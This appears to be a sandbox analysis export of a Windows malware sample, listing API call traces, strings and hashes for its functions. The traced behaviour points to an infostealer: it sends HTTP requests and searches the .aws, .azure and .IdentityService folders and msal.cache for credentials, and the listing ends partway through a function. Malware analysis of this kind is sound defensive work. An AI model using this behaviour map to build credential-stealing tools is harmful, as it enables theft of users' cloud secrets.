InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059F8
StrCmpCA.SHLWAPI(?,008CAEB0), ref: 00405A13
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B93
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,008CAFA0,00000000,?,00894990,00000000,?,00421A1C), ref: 00405E71
lstrlenA.KERNEL32(00000000), ref: 00405E82
GetProcessHeap.KERNEL32(00000000,?), ref: 00405E93
HeapAlloc.KERNEL32(00000000), ref: 00405E9A
lstrlenA.KERNEL32(00000000), ref: 00405EAF
memcpy.MSVCRT(?,00000000,00000000), ref: 00405EC6
lstrlenA.KERNEL32(00000000), ref: 00405ED8
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405EF1
memcpy.MSVCRT(?), ref: 00405EFE
lstrlenA.KERNEL32(00000000,?,?), ref: 00405F1B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F2F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F4C
InternetCloseHandle.WININET(00000000), ref: 00405FB0
InternetCloseHandle.WININET(00000000), ref: 00405FBD
HttpOpenRequestA.WININET(00000000,008CAEF0,?,008CA638,00000000,00000000,00400100,00000000), ref: 00405BF8

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

InternetCloseHandle.WININET(00000000), ref: 00405FC7

Strings

------, xrefs: 00405D4C
------, xrefs: 00405C0B
", xrefs: 00405CD5
", xrefs: 00405E16
------, xrefs: 00405A96

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
String ID: "$"$------$------$------
API String ID: 1406981993-2180234286
Opcode ID: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
Opcode Fuzzy Hash: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69

Function 00414D70 Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 119stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00414D87

Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B

lstrcatA.KERNEL32(?,00000000), ref: 00414DB0
lstrcatA.KERNEL32(?,\.azure\), ref: 00414DCD

Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943

memset.MSVCRT ref: 00414E13
lstrcatA.KERNEL32(?,00000000), ref: 00414E3C
lstrcatA.KERNEL32(?,\.aws\), ref: 00414E59

Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92

memset.MSVCRT ref: 00414E9F
lstrcatA.KERNEL32(?,00000000), ref: 00414EC8
lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00414EE5

Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
Part of subcall function 00414910: lstrcatA.KERNEL32(?,008CADE0,?,000003E8), ref: 00414A4A
Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31

memset.MSVCRT ref: 00414F2B

Strings

*.*, xrefs: 00414E64
Azure\.IdentityService, xrefs: 00414EEB
Azure\.azure, xrefs: 00414DD3
\.IdentityService\, xrefs: 00414ED9
zaA, xrefs: 00414DF1, 00414E7D, 00414F09, 00414F34, 00414DF4, 00414E80, 00414F0C
msal.cache, xrefs: 00414EF0
\.aws\, xrefs: 00414E4D
\.azure\, xrefs: 00414DC1
*.*, xrefs: 00414DD8
Azure\.aws, xrefs: 00414E5F

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaA
API String ID: 4017274736-156832076
Opcode ID: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
Opcode Fuzzy Hash: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A

Function 0081D157 Relevance: 31.9, APIs: 21, Instructions: 374stringmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF

Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79

Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C

Part of subcall function 00828DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00811660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 00828DED

Part of subcall function 0082AB87: lstrcpy.KERNEL32(00000000,?), ref: 0082ABD9
Part of subcall function 0082AB87: lstrcat.KERNEL32(00000000), ref: 0082ABE9

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0081D1EA
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0081D32E
RtlAllocateHeap.NTDLL(00000000), ref: 0081D335
lstrcat.KERNEL32(?,00000000), ref: 0081D46F
lstrcat.KERNEL32(?,00421478), ref: 0081D47E
lstrcat.KERNEL32(?,00000000), ref: 0081D491
lstrcat.KERNEL32(?,0042147C), ref: 0081D4A0
lstrcat.KERNEL32(?,00000000), ref: 0081D4B3
lstrcat.KERNEL32(?,00421480), ref: 0081D4C2
lstrcat.KERNEL32(?,00000000), ref: 0081D4D5
lstrcat.KERNEL32(?,00421484), ref: 0081D4E4
lstrcat.KERNEL32(?,00000000), ref: 0081D4F7
lstrcat.KERNEL32(?,00421488), ref: 0081D506
lstrcat.KERNEL32(?,00000000), ref: 0081D519
lstrcat.KERNEL32(?,0042148C), ref: 0081D528
lstrcat.KERNEL32(?,00000000), ref: 0081D53B
lstrcat.KERNEL32(?,00421490), ref: 0081D54A

Part of subcall function 0082AA87: lstrlen.KERNEL32(0081516C,?,?,0081516C,00420DDE), ref: 0082AA92
Part of subcall function 0082AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 0082AAEC

lstrlen.KERNEL32(?), ref: 0081D591
lstrlen.KERNEL32(?), ref: 0081D5A0
memset.MSVCRT ref: 0081D5EF

Part of subcall function 0082ACD7: StrCmpCA.SHLWAPI(0064A350,0081AA0E,?,0081AA0E,0064A350), ref: 0082ACF6

DeleteFileA.KERNEL32(00000000), ref: 0081D61B

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
String ID:
API String ID: 1973479514-0
Opcode ID: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
Instruction ID: af2bfa7a1eb9d88ac528cd66cfce869b503b2a74700f56cc9d5f6d210fb29a01
Opcode Fuzzy Hash: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
Instruction Fuzzy Hash: 55E13975950228EBCB08EBE4ED96EEE7379FF14701F104159F106E20A1DE35AA84CB63

Function 0040CEF0 Relevance: 31.9, APIs: 21, Instructions: 374stringmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,008948D0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF83
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D0C7
HeapAlloc.KERNEL32(00000000), ref: 0040D0CE
lstrcatA.KERNEL32(?,00000000,00899A80,00421474,00899A80,00421470,00000000), ref: 0040D208
lstrcatA.KERNEL32(?,00421478), ref: 0040D217
lstrcatA.KERNEL32(?,00000000), ref: 0040D22A
lstrcatA.KERNEL32(?,0042147C), ref: 0040D239
lstrcatA.KERNEL32(?,00000000), ref: 0040D24C
lstrcatA.KERNEL32(?,00421480), ref: 0040D25B
lstrcatA.KERNEL32(?,00000000), ref: 0040D26E
lstrcatA.KERNEL32(?,00421484), ref: 0040D27D
lstrcatA.KERNEL32(?,00000000), ref: 0040D290
lstrcatA.KERNEL32(?,00421488), ref: 0040D29F
lstrcatA.KERNEL32(?,00000000), ref: 0040D2B2
lstrcatA.KERNEL32(?,0042148C), ref: 0040D2C1
lstrcatA.KERNEL32(?,00000000), ref: 0040D2D4
lstrcatA.KERNEL32(?,00421490), ref: 0040D2E3

Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00899BA0,?,0042110C,?,00000000), ref: 0041A82B
Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885

lstrlenA.KERNEL32(?), ref: 0040D32A
lstrlenA.KERNEL32(?), ref: 0040D339
memset.MSVCRT ref: 0040D388

Part of subcall function 0041AA70: StrCmpCA.SHLWAPI(00000000,00421470,0040D1A2,00421470,00000000), ref: 0041AA8F

DeleteFileA.KERNEL32(00000000), ref: 0040D3B4

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
String ID:
API String ID: 2775534915-0
Opcode ID: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
Instruction ID: 94f9062ed3f4a6e26da847402fe0a382ec35b8ad99342330bde04fa79d6a5422
Opcode Fuzzy Hash: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
Instruction Fuzzy Hash: D2E17D75950108ABCB04FBE1DD96EEE7379BF14304F10405EF107B60A1DE38AA5ACB6A

Function 00815BC7 Relevance: 29.0, APIs: 19, Instructions: 493networkstringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0082AA07: lstrcpy.KERNEL32(?,00000000), ref: 0082AA4D

Part of subcall function 00814A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00814A51
Part of subcall function 00814A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00814A68
Part of subcall function 00814A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00814A7F
Part of subcall function 00814A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00814AA0
Part of subcall function 00814A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 00814AB0

Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00815C5F
StrCmpCA.SHLWAPI(?,0064A480), ref: 00815C7A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00815DFA
lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421A20,00000000,?,0064A0F0,00000000,?,0064A2F0,00000000,?,00421A1C), ref: 008160D8
lstrlen.KERNEL32(00000000), ref: 008160E9
GetProcessHeap.KERNEL32(00000000,?), ref: 008160FA
RtlAllocateHeap.NTDLL(00000000), ref: 00816101
lstrlen.KERNEL32(00000000), ref: 00816116
memcpy.MSVCRT(?,00000000,00000000), ref: 0081612D
lstrlen.KERNEL32(00000000), ref: 0081613F
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00816158
memcpy.MSVCRT(?), ref: 00816165
lstrlen.KERNEL32(00000000,?,?), ref: 00816182
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00816196
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 008161B3
InternetCloseHandle.WININET(00000000), ref: 00816217
InternetCloseHandle.WININET(00000000), ref: 00816224
HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 00815E5F

Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79

Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C

Part of subcall function 0082AB87: lstrcpy.KERNEL32(00000000,?), ref: 0082ABD9
Part of subcall function 0082AB87: lstrcat.KERNEL32(00000000), ref: 0082ABE9

InternetCloseHandle.WININET(00000000), ref: 0081622E

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
String ID:
API String ID: 1703137719-0
Opcode ID: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
Instruction ID: 56d77a86c6829d3e9b95134e3724bd0c34ba03352038e33e2810284b41abb002
Opcode Fuzzy Hash: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
Instruction Fuzzy Hash: 7212AA75950238EBCB19EBA4ED95EEEB379FF14700F504199B106A2091EF702B89CF52

Function 0081CBF7 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 383filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF

Part of subcall function 0082AB87: lstrcpy.KERNEL32(00000000,?), ref: 0082ABD9
Part of subcall function 0082AB87: lstrcat.KERNEL32(00000000), ref: 0082ABE9

Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C

Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0064A63C,00000000,?,0042144C,00000000,?,?), ref: 0081CCD3
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0081CCF0
GetFileSize.KERNEL32(00000000,00000000), ref: 0081CCFC
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0081CD0F
??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0081CD1C
ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0081CD40
StrStrA.SHLWAPI(?,0064A1B0,00420B52), ref: 0081CD5E
StrStrA.SHLWAPI(00000000,0064A364), ref: 0081CD85
StrStrA.SHLWAPI(?,0064A4D0,00000000,?,00421458,00000000,?,00000000,00000000,?,0064A15C,00000000,?,00421454,00000000,?), ref: 0081CF09
StrStrA.SHLWAPI(00000000,0064A4CC), ref: 0081CF20

Part of subcall function 0081CA87: memset.MSVCRT ref: 0081CABA
Part of subcall function 0081CA87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0081CAD8
Part of subcall function 0081CA87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0081CAE3
Part of subcall function 0081CA87: memcpy.MSVCRT(?,?,?), ref: 0081CB79

StrStrA.SHLWAPI(?,0064A4CC,00000000,?,0042145C,00000000,?,00000000,0064A0DC), ref: 0081CFC1
StrStrA.SHLWAPI(00000000,0064A5A8), ref: 0081CFD8

Part of subcall function 0081CA87: lstrcat.KERNEL32(?,00420B46), ref: 0081CBAA
Part of subcall function 0081CA87: lstrcat.KERNEL32(?,00420B47), ref: 0081CBBE
Part of subcall function 0081CA87: lstrcat.KERNEL32(?,00420B4E), ref: 0081CBDF

lstrlen.KERNEL32(00000000), ref: 0081D0AB
CloseHandle.KERNEL32(00000000), ref: 0081D103

Strings

, xrefs: 0081CC2D

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
String ID:
API String ID: 3555725114-3916222277
Opcode ID: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
Instruction ID: d3a0c2ee913cd106f4b8e55222d66bea6324be818399b5d5f354c31b9f0da46b
Opcode Fuzzy Hash: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
Instruction Fuzzy Hash: 72E1DC75900228EBCB19EBA8ED95EEEB779FF14700F004159F106A6191DF346A89CF52

Function 0040C990 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 383filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,008C8E90,00000000,?,0042144C,00000000,?,?), ref: 0040CA6C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CA89
GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA95
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CAA8
??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CAB5
ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CAD9
StrStrA.SHLWAPI(?,008C8E78,00420B52), ref: 0040CAF7
StrStrA.SHLWAPI(00000000,008C8ED8), ref: 0040CB1E
StrStrA.SHLWAPI(?,008C9C60,00000000,?,00421458,00000000,?,00000000,00000000,?,00899B10,00000000,?,00421454,00000000,?), ref: 0040CCA2
StrStrA.SHLWAPI(00000000,008C9B40), ref: 0040CCB9

Part of subcall function 0040C820: memset.MSVCRT ref: 0040C853
Part of subcall function 0040C820: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,00899AF0), ref: 0040C871
Part of subcall function 0040C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
Part of subcall function 0040C820: memcpy.MSVCRT(?,?,?), ref: 0040C912

StrStrA.SHLWAPI(?,008C9B40,00000000,?,0042145C,00000000,?,00000000,00899AF0), ref: 0040CD5A
StrStrA.SHLWAPI(00000000,00899830), ref: 0040CD71

Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978

lstrlenA.KERNEL32(00000000), ref: 0040CE44
CloseHandle.KERNEL32(00000000), ref: 0040CE9C

Strings

, xrefs: 0040C9C6

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
String ID:
API String ID: 3555725114-3916222277
Opcode ID: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
Instruction ID: fb2464dfdb87d028b9341c66972094ccea7bc9213c5b9a6eafc00a4a54def107
Opcode Fuzzy Hash: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
Instruction Fuzzy Hash: 2FE13E71911108ABCB14FBA1DC91FEEB779AF14314F40416EF10673191EF386A9ACB6A

Function 00418320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

RegOpenKeyExA.ADVAPI32(00000000,008C6C20,00000000,00020019,00000000,004205B6), ref: 004183A4
RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
wsprintfA.USER32 ref: 00418459
RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
RegCloseKey.ADVAPI32(00000000), ref: 0041848C
RegCloseKey.ADVAPI32(00000000), ref: 00418499

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Strings

%s\%s, xrefs: 0041844D
?, xrefs: 0041837A
- , xrefs: 004185A3

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: 10eb0c450f8aa63e58ce6e2e13bbd26e49cdc9fd0544e95f6096289088943245
Instruction ID: f03ee3f6de4a678c4a24becac03c3675d5d4362b87af83515ad79f9b006405b7
Opcode Fuzzy Hash: 10eb0c450f8aa63e58ce6e2e13bbd26e49cdc9fd0544e95f6096289088943245
Instruction Fuzzy Hash: B4813E75911118ABEB24DF50CD81FEAB7B9FF08714F008299E109A6180DF756BC6CFA5

Function 00410A60 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 205stringprocesssynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

memset.MSVCRT ref: 00410C1C
lstrcatA.KERNEL32(?,00000000), ref: 00410C35
lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
lstrcatA.KERNEL32(?,00000000), ref: 00410C88
lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
lstrlenA.KERNEL32(?), ref: 00410CA7
memset.MSVCRT ref: 00410CCD
memset.MSVCRT ref: 00410CE1

Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00899BA0,?,0042110C,?,00000000), ref: 0041A82B
Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885

Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,008948D0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

